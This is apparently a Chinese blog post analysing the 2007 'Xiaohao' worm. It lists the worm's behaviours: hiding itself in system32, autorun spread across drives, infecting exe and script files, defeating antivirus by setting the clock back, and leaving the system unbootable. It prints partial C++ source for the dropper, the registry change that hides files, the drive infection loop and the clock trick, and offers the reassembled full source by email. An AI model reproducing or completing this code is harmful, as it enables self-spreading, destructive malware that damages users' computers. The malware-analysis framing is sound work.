小浩病毒
相关的介绍百度一下吧，07年的病毒了。病毒的作者当年15岁。
- -
病毒行为：
1 将病毒本身拷贝到系统目录下，保存为exloroe.exe
2   更改注册表，设置文件夹隐藏选项
3   让杀软不能运行
4   在盘下创建隐藏的autorun.inf和病毒体，使得用户在双击盘符时，自动运行病毒
5   遍历目录，感染脚本文件，和exe文件
6   将被感染的exe文件换成病毒图标
7   记录所有被感染的文件，保存到c:\jilu.txt
8   让激活的窗口标题显示“已中毒 X14o-H4o's Virus”
9   使病毒以ActiveX的方式启动
10 创建一个没有用的隐藏的ie进程
11 对系统重要的exe文件也进行了感染，所以系统直接不能启动。所以activex启动也没有效果


一些病毒运行后的症状图片（无序）：

上图：auto方面的两个文件，被感染过后的文件mysyn.exe和nc.exe，被感染的exe大小都为734kb,还有就是一个jilu.txt


窗口标题显示“XXX”，双击盘符，效果为运行auto

感染exe文件，图标变成hao,大小734kB

被感染的脚本文件和exe文件的记录

被感染的脚本文件，后面都加了框架代码

重启之后直接不能进入系统

感受：15岁的小朋友英文不是很好,英文不懂，就用拼音。其实也很可爱啦。
ActiveX启动错了，我修改了一下，不过修不修改都一样，第二次就进不了系统了。
因为ActiveX改了，导致程序的流程，我也改了。


代码方面：其实我没找到一个完整版的，东拼西凑搞成一个还算完整的程序（要源码的留邮箱）

class CWormBegin : public CView

程序流程：
其实就是上面的那个病毒行为。
在对话框的初始化函数中调用Dirtory()    //作者英文写错了。
接着就是blahblah.......

void CXiaoHaoDlg::Dirctory()
{
     char ff[256];
     GetModuleFileName(NULL,ff,255);//得到程序的全路径
     char SystemDirectory[MAX_PATH];
     GetSystemDirectory(SystemDirectory,MAX_PATH);//得到系统路径
     CString m_systemdirectory;
     m_systemdirectory.Format("%s",SystemDirectory);
     m_systemdirectory+="\\exloroe.exe";
     CopyFile(ff,m_systemdirectory,NULL);//将病毒程序拷贝到system32下，名为exloroe.exe
     HiddenFile();//隐藏设置
     ****KAV();
     CWormBegin Worm;
     CString s;
     CString ss;
     char buff[256];
     int len=GetLogicalDriveStrings(sizeof(buff),buff);//获取现有的系统磁盘盘符
    
for(int i=0;i<len;i++)
{     
         if(buff[i]==0)
         {
            
             s =buff[i-3];
             s+=buff[i-2];
             s+=buff[i-1];
             if(s=="A:\\")
             {
                 continue;
             }
             else
             {
                 BOOL m_pd=Worm.GRDirctory(s); //开始 AUTO
                 if(!m_pd)
                     continue;
             }
         }
}
for(int ii=0;ii<len;ii++)
{
     if(buff[ii]==0)
     {
         ss =buff[ii-3];
         ss+=buff[ii-2];
         ss+=buff[ii-1];
         if(ss=="A:\\")
             continue;
         else
             Worm.BeginFind(ss);//感染脚本文件，exe文件
        
     }
}
     HiddenVirus();
         
}

void CXiaoHaoDlg::HiddenFile()   //使其不能查看 被隐藏的文件
{
     char lujing[]="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
     HKEY hkey;
     DWORD Data=0;     
     RegOpenKeyEx(HKEY_LOCAL_MACHINE,lujing,0,KEY_ALL_ACCESS,&hkey);//打开注册表
     RegSetValueEx(hkey,"CheckedValue",0,REG_DWORD,(CONST BYTE*)&Data,4); //修改注册表
     RegCloseKey(hkey);
}

void CXiaoHaoDlg::****KAV()
{
     SYSTEMTIME       stime;
     memset(&stime,0,sizeof(SYSTEMTIME));
     stime.wYear=2005;
     stime.wMonth=1;
     stime.wDay=17;
     SetLocalTime(&stime);//设置时间
     Sleep(200);
}